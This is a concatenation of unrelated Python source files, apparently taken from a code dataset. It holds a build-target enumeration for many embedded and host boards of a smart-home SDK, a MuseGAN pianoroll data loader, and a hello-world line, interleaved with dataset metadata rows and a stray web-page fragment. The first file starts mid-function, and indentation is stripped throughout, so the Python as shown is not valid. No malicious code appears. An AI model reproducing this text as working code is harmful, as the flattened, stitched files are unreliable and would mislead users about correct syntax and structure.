target_native = target.Extend(HostBoard.NATIVE.BoardName(), board=HostBoard.NATIVE)
targets = [target_native]
# x64 linux supports cross compile
cross_compile = (HostBoard.NATIVE.PlatformName() == 'linux') and (HostBoard.NATIVE.BoardName() != HostBoard.ARM64.BoardName())
if cross_compile:
targets.append(target.Extend('arm64', board=HostBoard.ARM64))
app_targets = []
# Don't cross compile some builds
app_targets.append(
target_native.Extend('rpc-console', app=HostApp.RPC_CONSOLE))
app_targets.append(
target_native.Extend('tv-app', app=HostApp.TV_APP))
app_targets.append(
target_native.Extend('tv-casting-app', app=HostApp.TV_CASTING_APP))
app_targets.append(
target_native.Extend('nl-test-runner', app=HostApp.NL_TEST_RUNNER))
for target in targets:
app_targets.append(target.Extend(
'all-clusters', app=HostApp.ALL_CLUSTERS))
if (HostBoard.NATIVE.PlatformName() == 'darwin'):
app_targets.append(target.Extend(
'chip-tool-darwin', app=HostApp.CHIP_TOOL_DARWIN))
app_targets.append(target.Extend('chip-tool', app=HostApp.CHIP_TOOL))
app_targets.append(target.Extend('thermostat', app=HostApp.THERMOSTAT))
app_targets.append(target.Extend('minmdns', app=HostApp.MIN_MDNS))
app_targets.append(target.Extend('light', app=HostApp.LIGHT))
app_targets.append(target.Extend('lock', app=HostApp.LOCK))
app_targets.append(target.Extend('shell', app=HostApp.SHELL))
app_targets.append(target.Extend(
'ota-provider', app=HostApp.OTA_PROVIDER, enable_ble=False))
app_targets.append(target.Extend(
'ota-requestor', app=HostApp.OTA_REQUESTOR, enable_ble=False))
app_targets.append(target.Extend('python-bindings', app=HostApp.PYTHON_BINDINGS))
builder = VariantBuilder()
# Possible build variants. Note that number of potential
# builds is exponential here
builder.AppendVariant(name="same-event-loop", validator=AcceptNameWithSubstrings(
['-chip-tool', '-chip-tool-darwin']), separate_event_loop=False),
builder.AppendVariant(name="no-interactive", validator=AcceptNameWithSubstrings(
['-chip-tool']), interactive_mode=False),
builder.AppendVariant(name="ipv6only", enable_ipv4=False),
builder.AppendVariant(name="no-ble", enable_ble=False),
builder.AppendVariant(name="no-wifi", enable_wifi=False),
builder.AppendVariant(name="tsan", conflicts=['asan'], use_tsan=True),
builder.AppendVariant(name="asan", conflicts=['tsan'], use_asan=True),
builder.AppendVariant(name="libfuzzer", requires=[
"clang"], use_libfuzzer=True),
builder.AppendVariant(name="clang", use_clang=True),
builder.AppendVariant(name="test", extra_tests=True),
builder.WhitelistVariantNameForGlob('no-interactive-ipv6only')
builder.WhitelistVariantNameForGlob('ipv6only')
for target in app_targets:
if ('-rpc-console' in target.name) or ('-python-bindings' in target.name) or ('nl-test-runner' in target.name):
# Single-variant builds
yield target
else:
builder.targets.append(target)
for target in builder.AllVariants():
if cross_compile and 'chip-tool' in target.name and 'arm64' in target.name and '-no-interactive' not in target.name:
# Interactive builds will not compile by default on arm cross compiles
# because libreadline is not part of the default sysroot
yield target.GlobBlacklist('Arm crosscompile does not support libreadline-dev')
else:
yield target
# Without extra build variants
yield target_native.Extend('chip-cert', app=HostApp.CERT_TOOL)
yield target_native.Extend('address-resolve-tool', app=HostApp.ADDRESS_RESOLVE)
yield target_native.Extend('address-resolve-tool-clang', app=HostApp.ADDRESS_RESOLVE,
use_clang=True).GlobBlacklist("Reduce default build variants")
yield target_native.Extend('address-resolve-tool-platform-mdns', app=HostApp.ADDRESS_RESOLVE,
use_platform_mdns=True).GlobBlacklist("Reduce default build variants")
yield target_native.Extend('address-resolve-tool-platform-mdns-ipv6only', app=HostApp.ADDRESS_RESOLVE,
use_platform_mdns=True, enable_ipv4=False).GlobBlacklist("Reduce default build variants")
test_target = Target(HostBoard.NATIVE.PlatformName(), HostBuilder)
for board in [HostBoard.NATIVE, HostBoard.FAKE]:
yield test_target.Extend(board.BoardName() + '-tests', board=board, app=HostApp.TESTS)
def Esp32Targets():
esp32_target = Target('esp32', Esp32Builder)
yield esp32_target.Extend('m5stack-all-clusters', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS)
yield esp32_target.Extend('m5stack-all-clusters-ipv6only', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS,
enable_ipv4=False)
yield esp32_target.Extend('m5stack-all-clusters-rpc', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS,
enable_rpcs=True)
yield esp32_target.Extend('m5stack-all-clusters-rpc-ipv6only', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS,
enable_rpcs=True, enable_ipv4=False)
yield esp32_target.Extend('c3devkit-all-clusters', board=Esp32Board.C3DevKit, app=Esp32App.ALL_CLUSTERS)
devkitc = esp32_target.Extend('devkitc', board=Esp32Board.DevKitC)
yield devkitc.Extend('all-clusters', app=Esp32App.ALL_CLUSTERS)
yield devkitc.Extend('all-clusters-ipv6only', app=Esp32App.ALL_CLUSTERS, enable_ipv4=False)
yield devkitc.Extend('shell', app=Esp32App.SHELL)
yield devkitc.Extend('light', app=Esp32App.LIGHT)
yield devkitc.Extend('lock', app=Esp32App.LOCK)
yield devkitc.Extend('bridge', app=Esp32App.BRIDGE)
yield devkitc.Extend('temperature-measurement', app=Esp32App.TEMPERATURE_MEASUREMENT)
yield devkitc.Extend('temperature-measurement-rpc', app=Esp32App.TEMPERATURE_MEASUREMENT, enable_rpcs=True)
yield esp32_target.Extend('qemu-tests', board=Esp32Board.QEMU, app=Esp32App.TESTS)
def Efr32Targets():
efr_target = Target('efr32', Efr32Builder)
board_targets = [
efr_target.Extend('brd4161a', board=Efr32Board.BRD4161A),
efr_target.Extend('brd4163a', board=Efr32Board.BRD4163A).GlobBlacklist(
'only user requested'),
efr_target.Extend('brd4164a', board=Efr32Board.BRD4164A).GlobBlacklist(
'only user requested'),
efr_target.Extend('brd4166a', board=Efr32Board.BRD4166A).GlobBlacklist(
'only user requested'),
efr_target.Extend('brd4170a', board=Efr32Board.BRD4170A).GlobBlacklist(
'only user requested'),
efr_target.Extend('brd4186a', board=Efr32Board.BRD4186A).GlobBlacklist(
'only user requested'),
efr_target.Extend('brd4187a', board=Efr32Board.BRD4187A).GlobBlacklist(
'only user requested'),
efr_target.Extend('brd4304a', board=Efr32Board.BRD4304A).GlobBlacklist(
'only user requested')
]
builder = VariantBuilder()
for board_target in board_targets:
builder.targets.append(board_target.Extend(
'window-covering', app=Efr32App.WINDOW_COVERING))
builder.targets.append(board_target.Extend(
'switch', app=Efr32App.SWITCH))
builder.targets.append(board_target.Extend(
'unit-test', app=Efr32App.UNIT_TEST))
builder.targets.append(
board_target.Extend('light', app=Efr32App.LIGHT))
builder.targets.append(board_target.Extend('lock', app=Efr32App.LOCK))
# Possible build variants. Note that number of potential
# builds is exponential here
builder.AppendVariant(name="rpc", validator=AcceptNameWithSubstrings(
['-light', '-lock']), enable_rpcs=True)
builder.AppendVariant(name="with-ota-requestor", enable_ota_requestor=True)
builder.WhitelistVariantNameForGlob('rpc')
for target in builder.AllVariants():
yield target
def NrfTargets():
target = Target('nrf', NrfConnectBuilder)
yield target.Extend('native-posix-64-tests', board=NrfBoard.NATIVE_POSIX_64, app=NrfApp.UNIT_TESTS)
targets = [
target.Extend('nrf5340dk', board=NrfBoard.NRF5340DK),
target.Extend('nrf52840dk', board=NrfBoard.NRF52840DK),
]
# Enable nrf52840dongle for all-clusters and lighting app only
yield target.Extend('nrf52840dongle-all-clusters', board=NrfBoard.NRF52840DONGLE, app=NrfApp.ALL_CLUSTERS)
yield target.Extend('nrf52840dongle-light', board=NrfBoard.NRF52840DONGLE, app=NrfApp.LIGHT)
for target in targets:
yield target.Extend('all-clusters', app=NrfApp.ALL_CLUSTERS)
yield target.Extend('lock', app=NrfApp.LOCK)
yield target.Extend('light', app=NrfApp.LIGHT)
yield target.Extend('shell', app=NrfApp.SHELL)
yield target.Extend('pump', app=NrfApp.PUMP)
yield target.Extend('pump-controller', app=NrfApp.PUMP_CONTROLLER)
rpc = target.Extend('light-rpc', app=NrfApp.LIGHT, enable_rpcs=True)
if '-nrf5340dk-' in rpc.name:
rpc = rpc.GlobBlacklist(
'Compile failure due to pw_build args not forwarded to proto compiler. '
'https://pigweed-review.googlesource.com/c/pigweed/pigweed/+/66760')
yield rpc
def AndroidTargets():
target = Target('android', AndroidBuilder)
yield target.Extend('arm-chip-tool', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TOOL)
yield target.Extend('arm64-chip-tool', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TOOL)
yield target.Extend('x64-chip-tool', board=AndroidBoard.X64, app=AndroidApp.CHIP_TOOL)
yield target.Extend('x86-chip-tool', board=AndroidBoard.X86, app=AndroidApp.CHIP_TOOL)
yield target.Extend('arm64-chip-test', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TEST)
yield target.Extend('androidstudio-arm-chip-tool', board=AndroidBoard.AndroidStudio_ARM, app=AndroidApp.CHIP_TOOL)
yield target.Extend('androidstudio-arm64-chip-tool', board=AndroidBoard.AndroidStudio_ARM64, app=AndroidApp.CHIP_TOOL)
yield target.Extend('androidstudio-x86-chip-tool', board=AndroidBoard.AndroidStudio_X86, app=AndroidApp.CHIP_TOOL)
yield target.Extend('androidstudio-x64-chip-tool', board=AndroidBoard.AndroidStudio_X64, app=AndroidApp.CHIP_TOOL)
yield target.Extend('arm64-chip-tvserver', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TVServer)
yield target.Extend('arm-chip-tvserver', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TVServer)
yield target.Extend('x86-chip-tvserver', board=AndroidBoard.X86, app=AndroidApp.CHIP_TVServer)
yield target.Extend('x64-chip-tvserver', board=AndroidBoard.X64, app=AndroidApp.CHIP_TVServer)
yield target.Extend('arm64-chip-tv-casting-app', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TV_CASTING_APP)
yield target.Extend('arm-chip-tv-casting-app', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TV_CASTING_APP)
def MbedTargets():
target = Target('mbed', MbedBuilder)
targets = [
target.Extend('CY8CPROTO_062_4343W',
board=MbedBoard.CY8CPROTO_062_4343W),
]
app_targets = []
for target in targets:
app_targets.append(target.Extend('lock', app=MbedApp.LOCK))
app_targets.append(target.Extend('light', app=MbedApp.LIGHT))
app_targets.append(target.Extend(
'all-clusters', app=MbedApp.ALL_CLUSTERS))
app_targets.append(target.Extend('pigweed', app=MbedApp.PIGWEED))
app_targets.append(target.Extend('shell', app=MbedApp.SHELL))
for target in app_targets:
yield target.Extend('release', profile=MbedProfile.RELEASE)
yield target.Extend('develop', profile=MbedProfile.DEVELOP).GlobBlacklist(
'Compile only for debugging purpose - '
'https://os.mbed.com/docs/mbed-os/latest/program-setup/build-profiles-and-rules.html')
yield target.Extend('debug', profile=MbedProfile.DEBUG).GlobBlacklist(
'Compile only for debugging purpose - '
'https://os.mbed.com/docs/mbed-os/latest/program-setup/build-profiles-and-rules.html')
def InfineonTargets():
target = Target('infineon', InfineonBuilder)
yield target.Extend('p6-lock', board=InfineonBoard.P6BOARD, app=InfineonApp.LOCK)
yield target.Extend('p6-all-clusters', board=InfineonBoard.P6BOARD, app=InfineonApp.ALL_CLUSTERS)
yield target.Extend('p6-light', board=InfineonBoard.P6BOARD, app=InfineonApp.LIGHT)
def AmebaTargets():
ameba_target = Target('ameba', AmebaBuilder)
yield ameba_target.Extend('amebad-all-clusters', board=AmebaBoard.AMEBAD, app=AmebaApp.ALL_CLUSTERS)
yield ameba_target.Extend('amebad-light', board=AmebaBoard.AMEBAD, app=AmebaApp.LIGHT)
yield ameba_target.Extend('amebad-pigweed', board=AmebaBoard.AMEBAD, app=AmebaApp.PIGWEED)
def K32WTargets():
target = Target('k32w', K32WBuilder)
yield target.Extend('light-ota-se', app=K32WApp.LIGHT, release=True, disable_ble=True, se05x=True).GlobBlacklist("Only on demand build")
yield target.Extend('light-release-no-ota', app=K32WApp.LIGHT, tokenizer=True, disable_ota=True, release=True)
yield target.Extend('shell-release', app=K32WApp.SHELL, release=True)
yield target.Extend('lock-release', app=K32WApp.LOCK, release=True)
yield target.Extend('lock-low-power-release', app=K32WApp.LOCK,
low_power=True, release=True).GlobBlacklist("Only on demand build")
def cc13x2x7_26x2x7Targets():
target = Target('cc13x2x7_26x2x7', cc13x2x7_26x2x7Builder)
yield target.Extend('lock-ftd', app=cc13x2x7_26x2x7App.LOCK, openthread_ftd=True)
yield target.Extend('lock-mtd', app=cc13x2x7_26x2x7App.LOCK, openthread_ftd=False)
yield target.Extend('pump', app=cc13x2x7_26x2x7App.PUMP)
yield target.Extend('pump-controller', app=cc13x2x7_26x2x7App.PUMP_CONTROLLER)
yield target.Extend('all-clusters', app=cc13x2x7_26x2x7App.ALL_CLUSTERS)
yield target.Extend('shell', app=cc13x2x7_26x2x7App.SHELL)
def Cyw30739Targets():
yield Target('cyw30739-cyw930739m2evb_01-light', Cyw30739Builder,
board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.LIGHT)
yield Target('cyw30739-cyw930739m2evb_01-lock', Cyw30739Builder,
board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.LOCK)
yield Target('cyw30739-cyw930739m2evb_01-ota-requestor', Cyw30739Builder,
board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.OTA_REQUESTOR).GlobBlacklist(
"Running out of XIP flash space")
yield Target('cyw30739-cyw930739m2evb_01-ota-requestor-no-progress-logging', Cyw30739Builder,
board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.OTA_REQUESTOR, progress_logging=False)
def QorvoTargets():
target = Target('qpg', QpgBuilder)
yield target.Extend('lock', board=QpgBoard.QPG6105, app=QpgApp.LOCK)
yield target.Extend('light', board=QpgBoard.QPG6105, app=QpgApp.LIGHT)
yield target.Extend('shell', board=QpgBoard.QPG6105, app=QpgApp.SHELL)
yield target.Extend('persistent-storage', board=QpgBoard.QPG6105, app=QpgApp.PERSISTENT_STORAGE)
def TizenTargets():
# Possible build variants.
# NOTE: The number of potential builds is exponential here.
builder = VariantBuilder()
builder.AppendVariant(name="no-ble", enable_ble=False)
builder.AppendVariant(name="no-wifi", enable_wifi=False)
builder.AppendVariant(name="asan", use_asan=True)
target = Target('tizen-arm', TizenBuilder, board=TizenBoard.ARM)
builder.targets.append(target.Extend('light', app=TizenApp.LIGHT))
for target in builder.AllVariants():
yield target
def Bl602Targets():
target = Target('bl602', Bl602Builder)
yield target.Extend('light', board=Bl602Board.BL602BOARD, app=Bl602App.LIGHT)
def IMXTargets():
target = Target('imx', IMXBuilder)
yield target.Extend('chip-tool', app=IMXApp.CHIP_TOOL)
yield target.Extend('lighting-app', app=IMXApp.LIGHT)
yield target.Extend('thermostat', app=IMXApp.THERMOSTAT)
yield target.Extend('all-clusters-app', app=IMXApp.ALL_CLUSTERS)
yield target.Extend('ota-provider-app', app=IMXApp.OTA_PROVIDER)
yield target.Extend('chip-tool-release', app=IMXApp.CHIP_TOOL, release=True)
yield target.Extend('lighting-app-release', app=IMXApp.LIGHT, release=True)
yield target.Extend('thermostat-release', app=IMXApp.THERMOSTAT, release=True)
yield target.Extend('all-clusters-app-release', app=IMXApp.ALL_CLUSTERS, release=True)
yield target.Extend('ota-provider-app-release', app=IMXApp.OTA_PROVIDER, release=True)
ALL = []
target_generators = [
HostTargets(),
Esp32Targets(),
Efr32Targets(),
NrfTargets(),
AndroidTargets(),
MbedTargets(),
InfineonTargets(),
AmebaTargets(),
K32WTargets(),
cc13x2x7_26x2x7Targets(),
Cyw30739Targets(),
QorvoTargets(),
TizenTargets(),
Bl602Targets(),
IMXTargets(),
]
for generator in target_generators:
for target in generator:
ALL.append(target)
# Simple targets added one by one
ALL.append(Target('telink-tlsr9518adk80d-light', TelinkBuilder,
board=TelinkBoard.TLSR9518ADK80D, app=TelinkApp.LIGHT))
ALL.append(Target('telink-tlsr9518adk80d-light-switch', TelinkBuilder,
board=TelinkBoard.TLSR9518ADK80D, app=TelinkApp.SWITCH))
# have a consistent order overall
ALL.sort(key=lambda t: t.name)
| 1.234375 | 1 |
src/musegan/data.py | TRINITRONIC/musegan | 0 | 1298 | """This file contains functions for loading and preprocessing pianoroll data.
"""
import logging
import numpy as np
import tensorflow.compat.v1 as tf
from musegan.config import SHUFFLE_BUFFER_SIZE, PREFETCH_SIZE
LOGGER = logging.getLogger(__name__)
# --- Data loader --------------------------------------------------------------
def load_data_from_npy(filename):
"""Load and return the training data from a npy file."""
return np.load(filename)
def load_data_from_npz(filename):
"""Load and return the training data from a npz file (sparse format)."""
with np.load(filename) as f:
data = np.zeros(f['shape'], np.bool_)
data[[x for x in f['nonzero']]] = True
return data
def load_data(data_source, data_filename):
"""Load and return the training data."""
if data_source == 'sa':
import SharedArray as sa
return sa.attach(data_filename)
if data_source == 'npy':
return load_data_from_npy(data_filename)
if data_source == 'npz':
return load_data_from_npz(data_filename)
raise ValueError("Expect `data_source` to be one of 'sa', 'npy', 'npz'. "
"But get " + str(data_source))
# --- Dataset Utilities -------------------------------------------------------
def random_transpose(pianoroll):
"""Randomly transpose a pianoroll with [-5, 6] semitones."""
semitone = np.random.randint(-5, 6)
if semitone > 0:
pianoroll[:, semitone:, 1:] = pianoroll[:, :-semitone, 1:]
pianoroll[:, :semitone, 1:] = 0
elif semitone < 0:
pianoroll[:, :semitone, 1:] = pianoroll[:, -semitone:, 1:]
pianoroll[:, semitone:, 1:] = 0
return pianoroll
def set_pianoroll_shape(pianoroll, data_shape):
"""Set the pianoroll shape and return the pianoroll."""
pianoroll.set_shape(data_shape)
return pianoroll
def set_label_shape(label):
"""Set the label shape and return the label."""
label.set_shape([1])
return label
# --- Sampler ------------------------------------------------------------------
def get_samples(n_samples, data, labels=None, use_random_transpose=False):
"""Return some random samples of the training data."""
indices = np.random.choice(len(data), n_samples, False)
if np.issubdtype(data.dtype, np.bool_):
sample_data = data[indices] * 2. - 1.
else:
sample_data = data[indices]
if use_random_transpose:
sample_data = np.array([random_transpose(x) for x in sample_data])
if labels is None:
return sample_data
return sample_data, labels[indices]
# --- Tensorflow Dataset -------------------------------------------------------
def _gen_data(data, labels=None):
"""Data Generator."""
if labels is None:
for item in data:
if np.issubdtype(data.dtype, np.bool_):
yield item * 2. - 1.
else:
yield item
else:
for i, item in enumerate(data):
if np.issubdtype(data.dtype, np.bool_):
yield (item * 2. - 1., labels[i])
else:
yield (item, labels[i])
def get_dataset(data, labels=None, batch_size=None, data_shape=None,
use_random_transpose=False, num_threads=1):
"""Create and return a tensorflow dataset from an array."""
if labels is None:
dataset = tf.data.Dataset.from_generator(
lambda: _gen_data(data), tf.float32)
if use_random_transpose:
dataset = dataset.map(
lambda pianoroll: tf.py_func(
random_transpose, [pianoroll], tf.float32),
num_parallel_calls=num_threads)
dataset = dataset.map(lambda pianoroll: set_pianoroll_shape(
pianoroll, data_shape), num_parallel_calls=num_threads)
else:
assert len(data) == len(labels), (
"Lengths of `data` and `lables` do not match.")
dataset = tf.data.Dataset.from_generator(
lambda: _gen_data(data, labels), [tf.float32, tf.int32])
if use_random_transpose:
dataset = dataset.map(
lambda pianoroll, label: (
tf.py_func(random_transpose, [pianoroll], tf.float32),
label),
num_parallel_calls=num_threads)
dataset = dataset.map(
lambda pianoroll, label: (set_pianoroll_shape(
pianoroll, data_shape), set_label_shape(label)),
num_parallel_calls=num_threads)
dataset = dataset.shuffle(SHUFFLE_BUFFER_SIZE).repeat().batch(batch_size)
return dataset.prefetch(PREFETCH_SIZE)
| 2.859375 | 3 |
Python/hello-world-pt-BR.py | PushpneetSingh/Hello-world | 1,428 | 1299 | print(u"Ol<NAME>!") | 1.390625 | 1 |
Subsets and Splits